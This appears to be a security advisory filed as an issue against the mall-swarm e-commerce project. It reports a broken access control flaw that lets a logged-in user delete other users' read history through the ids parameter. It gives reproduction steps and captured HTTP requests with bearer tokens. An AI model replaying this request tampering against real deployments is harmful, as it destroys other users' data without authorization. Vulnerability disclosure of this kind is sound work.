The mall-swarm application contains an improper access control vulnerability, allowing unauthorized deletion of user read history. #17
Description
Contributors: Huang Weigang
1. Vulnerability Impact
mall-swarm <=1.0.3 (latest)
https://github.com/macrozheng/mall-swarm
2. Vulnerability Location
POST /member/readHistory/delete HTTP/1.1
3. Code Analysis
First, the API accepts ids as the parameter.
Furthermore, in the subsequent implementation code the system directly uses id to delete the history data, but there is no check to verify that this data belongs to the currently logged-in user.
Vulnerability Reproduction
- Log in as User A.
- Capture the request made when User A deletes their read history.
- Modify the
idsparameter in the request to include IDs belonging to User B. - Send the modified request to the server.
- Observe that the read history entries for User B are deleted without authorization.
USER-A:
"type": "request",
"parameters": {
"method": "POST",
"url": "http://xxxx/member/readHistory/delete",
"headers": {
"authorization": "Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJ0ZXN0IiwiY3JlYXRlZCI6MTc2MTc1NjAyMDgzMiwiZXhwIjoxNzYyMzYwODIwfQ.b5ezoUwfw4NlBxpRDpZ_l6_42dZA0tuEj2_lpfxfPnY22wEgmUJHlrBjy--Zl4GMtOreR7ASe6PGdH4WhTrgkw",
"referer": "http://192.168.136.226:8060/",
"accept-language": "zh-CN,zh;q=0.9",
"user-agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1",
"content-type": "application/json;charset=UTF-8",
"Content-Type": "application/x-www-form-urlencoded"
},
"params": {
"ids": "1"
},
"json": {},
"data": {},
"files": {}
}
},
"响应参数": {
"type": "response",
"parameters": {
"code": 200,
"message": "操作成功",
"data": 1
}
},
USER-B:
"parameters": {
"method": "POST",
"url": "http://xxxx/member/readHistory/delete",
"headers": {
"authorization": "Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJtZW1iZXIiLCJjcmVhdGVkIjoxNzYxNzU1ODU0OTcwLCJleHAiOjE3NjIzNjA2NTR9.WMBhMO966qKtl2_28JNfrbOr3fa8kqbfFOILmw2M8XLuh-fZ5mgJHoY66H27H0PZdlf4MdQHN7tD-tGABXYLTQ",
"referer": "http://192.168.136.226:8060/",
"accept-language": "zh-CN,zh;q=0.9",
"user-agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1",
"content-type": "application/json;charset=UTF-8",
"Content-Type": "application/x-www-form-urlencoded"
},
"params": {
"ids": "1"
},
"json": {},
"data": {},
"files": {}
}
},
"响应参数": {
"type": "response",
"parameters": {
"code": 200,
"message": "操作成功",
"data": 1
}
},
4. Impact Description
This vulnerability allows an attacker to delete the read history of other users by manipulating the ids parameter in the request. This results in unauthorized access and deletion of user data, leading to a critical breakdown in access controls.